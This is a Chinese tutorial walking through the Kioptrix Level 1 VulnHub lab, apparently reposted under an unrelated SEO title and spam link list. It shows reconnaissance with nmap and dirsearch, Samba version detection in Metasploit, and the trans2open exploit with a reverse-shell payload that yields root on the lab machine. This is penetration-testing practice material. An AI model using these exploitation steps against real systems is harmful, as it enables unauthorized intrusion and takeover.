当前位置: 首页 > news >正文

保定免费建站网络公司经营范围可以加技术培训

保定免费建站,网络公司经营范围可以加技术培训,做带数据库的网站,dw网站建设的常用技术简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。 项目地址:Kioptrix: Level 1 (#1) ~ VulnHub 信息收集 查看本机IP,靶机跟kali都是使用…

简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
项目地址:Kioptrix: Level 1 (#1) ~ VulnHub

信息收集

查看本机IP,靶机跟kali都是使用NAT模式,所以看一下本机IP,扫一下IP段就可以看到靶机的IP了。

nmap扫描存活,因为我NAT设置的起点范围是100所以我扫的是100-254.

nmap -sn 192.168.2.100-254

因为我本机没开,192.168.2.100是kali的IP,所以192.168.2.122就是靶机IP了。
锁定靶机IP为192.168.2.122

接下来对192.168.2.122进行一个常用端口扫描。

nmap -sS -v- n 192.168.2.122

可以看到开放了22,80,111,139,443,1024等端口,我们访问80端口可以看到是apache的默认首页。

对网页进行目录扫描发下如下路径。

dirsearch.py -u http://192.168.2.122

好像没什么用,查看一下其他端口,以及服务的版本信息。

nmap -sS -sV 192.168.2.122

端口服务版本信息

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:0C:61:80 (VMware)

重点看一下samba服务,用msf查看一下samba的版本

msf6 > use auxiliary/scanner/smb/smb_version 
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.2.122
rhosts => 192.168.2.122
msf6 auxiliary(scanner/smb/smb_version) > run[*] 192.168.2.122:139     - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.2.122:139     -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.2.122:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > 

samba版本信息:Samba 2.2.1a
利用searchsploit Samba 2.2.1a 查看相关版本的samba是否存在漏洞。运气很好,有几个。我们使用msf试一下第一个。

msf6 auxiliary(scanner/smb/smb_version) > search trans2open

set rhosts 192.168.2.122                  # 设置目标
set payload linux/x86/shell_reverse_tcp   # 设置payload
run

成功获取root权限。Kioptrix-level-1这个靶场对新手来说还是挺友好的。初学者可以做做试试看。

http://www.yayakq.cn/news/111936/

相关文章:

  • 郑州做网站哪个河南做外贸网站的公司简介
  • 南昌网站建设方案开发做纪录片卖给视频网站
  • 如何用discuz做网站抖音代运营协议模板
  • 黑龙江建设网站潍坊住房公积金个人查询入口
  • 做ppt图表的网站网站建设的栏目内容
  • 百度自助网站建设绛县苗木网网站是由谁建设的
  • 知名企业网站大全专门做羽毛球的网站
  • 网站公司图片建设网站需要数据库备份
  • 织梦做的网站打不开网页临沂做网站建设的公司
  • 在小说网站做编辑怎么找承德网站建设流程
  • 建设集团招工信息网站合肥市建设网
  • 高端的培训行业网站开发男女做那种的的视频网站
  • 有哪些专做自然风景图片的网站seo推广和百度推广的区别
  • 怎样保存网站资料做证据网站建设公司工作枯燥吗
  • 可以做mv 的视频网站国外游戏商城网站欣赏
  • 电商网站开发商深圳企业建站招聘
  • 外包做网站多少钱静态网页开发工具
  • 网站建设与管理适合男的还是女的中国视觉设计网站
  • 做网站 设计师很网络零售的优势有哪些
  • 网站邮件发送功能怎么做湖南网站建设kaodezhu
  • 辽宁鞍山建设工程信息网站苏州诗华洛网站建设
  • 义乌网站建设联系方式经典网站建设
  • 网站建设程序开发过程网站系统建设招标文件
  • 网站让百度收录地方网站方案
  • 专门做拼花网站有意义的网站
  • 泾县网站建设2022年小微企业所得税优惠政策
  • 制作网站协议网站怎么建站点
  • 宿迁网站建设与管理网络工程师考试大纲
  • 金华在线制作网站国家域名注册证书有用吗
  • 白酒 网站模板WordPress站点地址填错